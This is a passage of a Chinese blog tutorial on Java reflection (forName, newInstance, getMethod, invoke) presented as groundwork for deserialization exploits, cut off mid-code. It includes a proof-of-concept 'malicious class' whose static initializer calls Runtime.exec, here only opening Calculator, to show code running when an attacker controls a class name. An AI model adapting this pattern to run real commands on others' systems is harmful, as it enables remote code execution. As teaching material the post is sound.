<!DOCTYPE html>
<html lang=zh>
<head><!-- hexo injector head_begin start --><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css" crossorigin="anonymous"><!-- hexo injector head_begin end -->
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Java安全可以从反序列化漏洞开始说起，反序列化漏洞⼜可以从反射开始说起。  Java安全漫谈-反射篇 可以获取到任何类的构造方法Constructors、成员方法Methods、成员变量Fields等信息   核心方法：基本上这⼏个⽅法包揽了Java安全⾥各种和反射有关的Payload。 获取类对象的⽅法： forName 实例化类对象的⽅法： newInstance 获取函数的⽅法： get">
<meta property="og:type" content="article">
<meta property="og:title" content="Java安全漫谈-反射篇">
<meta property="og:url" content="https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html">
<meta property="og:site_name" content="M1r0ku">
<meta property="og:description" content="Java安全可以从反序列化漏洞开始说起，反序列化漏洞⼜可以从反射开始说起。  Java安全漫谈-反射篇 可以获取到任何类的构造方法Constructors、成员方法Methods、成员变量Fields等信息   核心方法：基本上这⼏个⽅法包揽了Java安全⾥各种和反射有关的Payload。 获取类对象的⽅法： forName 实例化类对象的⽅法： newInstance 获取函数的⽅法： get">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87-0.png">
<meta property="article:published_time" content="2023-02-16T02:30:00.000Z">
<meta property="article:modified_time" content="2024-02-04T18:10:33.571Z">
<meta property="article:author" content="M1r0ku">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="Ysoserial">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87-0.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Java安全漫谈-反射篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="M1r0ku" type="application/atom+xml" />
    
	<!-- mathjax -->
	

  <!-- FancyBox -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.css" crossorigin="anonymous" />
  
  
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/lists/">Lists</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-RMI%E7%AF%87.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/posts/%E4%BB%8E%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%88%B0RCE%E5%86%8D%E5%88%B0%E5%A4%9A%E5%8F%B0%E6%9C%BA%E5%99%A8%E6%9D%83%E9%99%90.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&text=Java安全漫谈-反射篇"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&is_video=false&description=Java安全漫谈-反射篇"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Java安全漫谈-反射篇&body=Check out this article: https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&title=Java安全漫谈-反射篇"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&name=Java安全漫谈-反射篇&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87.html&t=Java安全漫谈-反射篇"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87"><span class="toc-number">1.</span> <span class="toc-text">Java安全漫谈-反射篇</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-forName"><span class="toc-number">1.1.</span> <span class="toc-text">Class.forName</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E6%95%B0initialize"><span class="toc-number">1.1.1.</span> <span class="toc-text">参数initialize</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E5%88%A9%E7%94%A8"><span class="toc-number">1.1.2.</span> <span class="toc-text">简单利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%B1%BB%E5%AF%B9%E8%B1%A1%E7%9A%84%E5%85%B6%E5%AE%83%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.3.</span> <span class="toc-text">获取类对象的其它函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E5%86%85%E9%83%A8%E7%B1%BB"><span class="toc-number">1.1.4.</span> <span class="toc-text">调用内部类</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-newInstance"><span class="toc-number">1.2.</span> <span class="toc-text">Class.newInstance</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A7%81%E6%9C%89%E7%9A%84%E7%B1%BB%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.1.</span> <span class="toc-text">私有的类构造方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getMethod%E5%92%8Cinvoke"><span class="toc-number">1.2.2.</span> <span class="toc-text">getMethod和invoke</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-getConstructor"><span class="toc-number">1.3.</span> <span class="toc-text">Class.getConstructor</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E6%9B%BF%E4%BB%A3%E5%BC%BA%E5%88%B6%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2"><span class="toc-number">1.3.1.</span> <span class="toc-text">反射替代强制类型转换</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AF%E5%8F%98%E9%95%BF%E5%8F%82%E6%95%B0"><span class="toc-number">1.3.2.</span> <span class="toc-text">可变长参数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Class-getDeclared"><span class="toc-number">1.4.</span> <span class="toc-text">Class.getDeclared</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E7%A7%81%E6%9C%89%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95"><span class="toc-number">1.4.1.</span> <span class="toc-text">反射私有构造方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B-%E6%B2%99%E7%9B%92%E7%BB%95%E8%BF%87"><span class="toc-number">1.5.</span> <span class="toc-text">实例-沙盒绕过</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Java安全漫谈-反射篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">M1r0ku</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-02-16T02:30:00.000Z" itemprop="datePublished">2023-02-16</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Java/">Java</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Ysoserial/" rel="tag">Ysoserial</a>, <a class="tag-link-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <blockquote>
<p>Java安全可以从反序列化漏洞开始说起，反序列化漏洞⼜可以从反射开始说起。</p>
</blockquote>
<h1 id="Java安全漫谈-反射篇"><a href="#Java安全漫谈-反射篇" class="headerlink" title="Java安全漫谈-反射篇"></a>Java安全漫谈-反射篇</h1><blockquote>
<p>可以获取到任何类的构造方法<code>Constructors</code>、成员方法<code>Methods</code>、成员变量<code>Fields</code>等信息</p>
</blockquote>
<ul>
<li>核心方法：基本上这⼏个⽅法包揽了Java安全⾥各种和反射有关的Payload。<ul>
<li>获取类对象的⽅法： <code>forName</code></li>
<li>实例化类对象的⽅法： <code>newInstance</code></li>
<li>获取函数的⽅法： <code>getMethod</code></li>
<li>执⾏函数的⽅法： <code>invoke</code></li>
</ul>
</li>
</ul>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-ucjdails7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-ucjdails7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">execute</span><span class="params">(String className, String methodName)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    <span class="type">Class</span> <span class="variable">clazz</span> <span class="operator">=</span> Class.forName(className);</span><br><span class="line">    clazz.getMethod(methodName).invoke(clazz.newInstance());</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


<h2 id="Class-forName"><a href="#Class-forName" class="headerlink" title="Class.forName"></a>Class.forName</h2><blockquote>
<p>通常一个JVM下，只会有一个ClassLoader，而一个ClassLoader下，一种类只会有一个Class对象存在、所以一个JVM中，一种类只会有一个Class对象存在。</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://docs.oracle.com/javase/7/docs/api/java/lang/Class.html#forName%28java.lang.String%29">Class.forName()</a>，有两个函数重载，其中方法1可以理解为方法2的封装：</p>
<ul>
<li><code>Class&lt;?&gt; forName(String name)</code></li>
<li><code>Class&lt;?&gt; forName(String name, boolean initialize,ClassLoader loader)</code><ul>
<li><code>name</code>：类名，即类完整路径，如<code>java.lang.Runtime</code>，</li>
<li><code>initialize</code>：是否初始化</li>
<li><code>ClassLoader</code>：类加载器，Java默认的ClassLoader就是根据类名来加载类</li>
</ul>
</li>
</ul>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-fmv51yls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-fmv51yls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Class.forName(className);</span><br><span class="line"><span class="comment">// 等于</span></span><br><span class="line">Class.forName(className, <span class="literal">true</span>, currentLoader);</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<h3 id="参数initialize"><a href="#参数initialize" class="headerlink" title="参数initialize"></a>参数initialize</h3><p>先来看一段代码，分别通过2种方式运行：类初始化<code>forName</code>、类实例化<code>new</code></p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-5hq5jpls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-5hq5jpls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TrainPrint</span> &#123;</span><br><span class="line">    &#123;</span><br><span class="line">        System.out.printf(<span class="string">&quot;Empty block initial %s\n&quot;</span>, <span class="built_in">this</span>.getClass());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        System.out.printf(<span class="string">&quot;Static initial %s\n&quot;</span>, TrainPrint.class);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">TrainPrint</span><span class="params">()</span> &#123;</span><br><span class="line">        System.out.printf(<span class="string">&quot;Initial %s\n&quot;</span>, <span class="built_in">this</span>.getClass());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="comment">// 类初始化</span></span><br><span class="line">        <span class="comment">// Class.forName(&quot;reflection.TrainPrint&quot;);</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// 类实例化</span></span><br><span class="line">        <span class="type">TrainPrint</span> <span class="variable">test</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TrainPrint</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">类初始化输出结果</span></span><br><span class="line"><span class="comment">  Static initial class reflection.TrainPrint</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">类实例化输出结果</span></span><br><span class="line"><span class="comment">  Static initial class reflection.TrainPrint</span></span><br><span class="line"><span class="comment">  Empty block initial class reflection.TrainPrint</span></span><br><span class="line"><span class="comment">  Initial class reflection.TrainPrint</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>其中，<code>static&#123;&#125;</code>就是在<strong>类初始化</strong>时调用的，<code>&#123;&#125;</code>则会在构造函数的<code>super&#123;&#125;</code>后面，但在当前构造函数内容的前面。上面例子执行顺序为：</p>
<ul>
<li>类初始化：<code>static&#123;&#125;</code></li>
<li>类实例化：<code>static&#123;&#125; -&gt; &#123;&#125; -&gt; 构造函数</code></li>
</ul>
<p>所以，<code>forName</code>中的<code>initialize</code>其实是决定是否执⾏<strong>类初始化</strong>，而不是<strong>类实例化</strong></p>
<h3 id="简单利用"><a href="#简单利用" class="headerlink" title="简单利用"></a>简单利用</h3><p>上面说到，在使用<code>forName()</code>进行类初始化时，会执行<code>static&#123;&#125;</code>中的代码<br>假设存在一个函数，其中的<code>className</code>可控</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-upizamls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-upizamls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestRef</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">ref</span><span class="params">(String name)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        Class.forName(name);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">className</span> <span class="operator">=</span> <span class="string">&quot;reflection.TestCalc&quot;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="type">TestRef</span> <span class="variable">testRef</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">TestRef</span>();</span><br><span class="line">        testRef.ref(className);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>那么可以构造一个恶意类，在<code>static&#123;&#125;</code>中编写恶意代码。当这个恶意类被带入目标机器该函数时，触发<code>forName</code>进行类初始化，从而执行其中的恶意代码（实际情况中如果需要将这个恶意类带⼊⽬标机器中，就涉及到<code>ClassLoader</code>的利⽤）</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-4nte9vls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-4nte9vls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestCalc</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Runtime</span> <span class="variable">rt</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">            String[] commands = &#123;<span class="string">&quot;open&quot;</span>, <span class="string">&quot;/System/Applications/Calculator.app&quot;</span>&#125;;</span><br><span class="line">            <span class="type">Process</span> <span class="variable">pc</span> <span class="operator">=</span> rt.exec(commands);</span><br><span class="line">            pc.waitFor();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87-0.png" data-caption="Java安全漫谈-反射篇-0"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-%E5%8F%8D%E5%B0%84%E7%AF%87-0.png" alt="Java安全漫谈-反射篇-0"></a></p>
<h3 id="获取类对象的其它函数"><a href="#获取类对象的其它函数" class="headerlink" title="获取类对象的其它函数"></a>获取类对象的其它函数</h3><p><code>forName</code>不是获取“类”的唯⼀途径，通常有三种⽅式获取⼀个“类”，也就是<code>java.lang.Class</code>对象：</p>
<ul>
<li><code>Class.forName(className)</code>，如果已经知道某个类的名字，这样可以获取到它的类</li>
<li><code>obj.getClass()</code>，如果上下文存在某个类的实例<code>obj</code>，可以直接获取到它的类</li>
<li><code>Test.class</code>，如果已经加载了某个类，只是想获取它的<code>java.lang.Class</code>对象，那么直接取它的<code>class</code>属性即可。这个方法其实不属于反射<blockquote>
<p>上面第1和第2种方式获取Class对象时会导致<strong>类属性</strong>被初始化，而且只会执行一次。</p>
</blockquote>
</li>
</ul>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-gzfngcls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-gzfngcls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestReflection</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">className</span> <span class="operator">=</span> <span class="string">&quot;java.lang.Runtime&quot;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Class</span> <span class="variable">class1</span> <span class="operator">=</span> Class.forName(className);</span><br><span class="line">            <span class="type">Class</span> <span class="variable">class2</span> <span class="operator">=</span> java.lang.Runtime.class;</span><br><span class="line">            <span class="type">Class</span> <span class="variable">class3</span> <span class="operator">=</span> ClassLoader.getSystemClassLoader().loadClass(className);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>


<h3 id="调用内部类"><a href="#调用内部类" class="headerlink" title="调用内部类"></a>调用内部类</h3><blockquote>
<p>在正常情况下，除了系统类，如果我们想拿到一个类，需要先<code>import</code>才能使用。而使用<code>forName</code>就不需要，这样对于我们的攻击者来说就十分有利，我们可以加载任意类。</p>
</blockquote>
<p>另外，经常在一些源码里看到，类名的部分包含<code>$</code>符号，比如 Fastjson 在<code>checkAutoType</code>时就会先将<code>$</code>替换成<code>.</code>（参考链接：<a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/blob/fcc9c2a/src/main/java/com/alibaba/fastjson/parser/ParserConfig.java#L1038">fastjson&#x2F;parser&#x2F;ParserConfig.java#L1038</a>）<br><code>**$**</code><strong>的作用是查找内部类</strong>：Java 的普通类<code>C1</code>中支持编写内部类<code>C2</code>，而在编译的时候，会生成两个文件：<code>C1.class</code>和<code>C1$C2.class</code>，通过<code>Class.forName(&quot;C1$C2&quot;)</code>即可加载这个内部类。</p>
<h2 id="Class-newInstance"><a href="#Class-newInstance" class="headerlink" title="Class.newInstance"></a>Class.newInstance</h2><blockquote>
<p>获得类以后，可以继续使用反射来获取类中的属性和方法，也可以实例化这个类再调用方法。</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://docs.oracle.com/javase/7/docs/api/java/lang/Class.html#newInstance%28%29">Class.newInstance()</a>，Java反射框架中<strong>类对象创建新的实例化对象</strong>的方法。作用就是调用这个类的无参构造函数。当调用<code>newInstance</code>不成功时，原因可能是：</p>
<ul>
<li>使用的类没有无参构造函数</li>
<li>使用的类构造函数是私有的</li>
</ul>
<h3 id="私有的类构造方法"><a href="#私有的类构造方法" class="headerlink" title="私有的类构造方法"></a>私有的类构造方法</h3><p>最常见的情况就是<code>java.lang.Runtime</code>，这个类在构造命令执行Payload时经常用到，但不能直接这样来执行命令：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-bpfb7uls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-bpfb7uls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> reflection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestNewInstance</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">clazz</span> <span 